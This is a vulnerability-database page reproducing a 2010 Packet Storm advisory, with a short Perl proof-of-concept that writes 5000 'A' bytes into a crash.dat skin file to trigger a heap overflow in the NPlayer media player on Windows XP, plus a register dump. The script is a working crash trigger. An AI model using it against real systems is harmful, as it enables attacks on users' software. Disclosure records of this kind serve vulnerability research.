Lucene search
K

NPlayer Heap Overflow

🗓️ 14 Jan 2010 00:00:00Reported by Rehan AhmedType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

NPlayer Heap Overflow, Local Heap Overflow PoC, WinXP SP2, crash.dat skin fil

Code
`#!/usr/bin/perl  
#Exploit Title:NPlayer (.dat Skin File) Local Heap Overflow PoC  
#Date:13/01/2010  
#Author:Vulnerability Discovered By Rehan Ahmed ([email protected])  
#Software Link:http://www.softpedia.com/get/Multimedia/Video/Video-Players/nplayer.shtml  
#Tested On: WinXP SP2  
########################################################################################  
##EBX 41414141  
##ESP 0012EF6C  
##EBP 00DA50F8 ASCII "C:\Program Files\n.player\skins\crash.dat"  
##ESI 0012EFD8  
##EDI 014143F8  
##EIP 7C90EAF0 ntdll.7C90EAF0  
#######################################################################################  
########################################################################################  
my $boom="\x41" x 5000;  
my $file="crash.dat";  
open($FILE,">$file");  
print $FILE $boom;  
close($FILE);  
print "File Successfully Created\n";  
########################################################################################  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jan 2010 00:00Current
0.5Low risk
Vulners AI Score0.5
23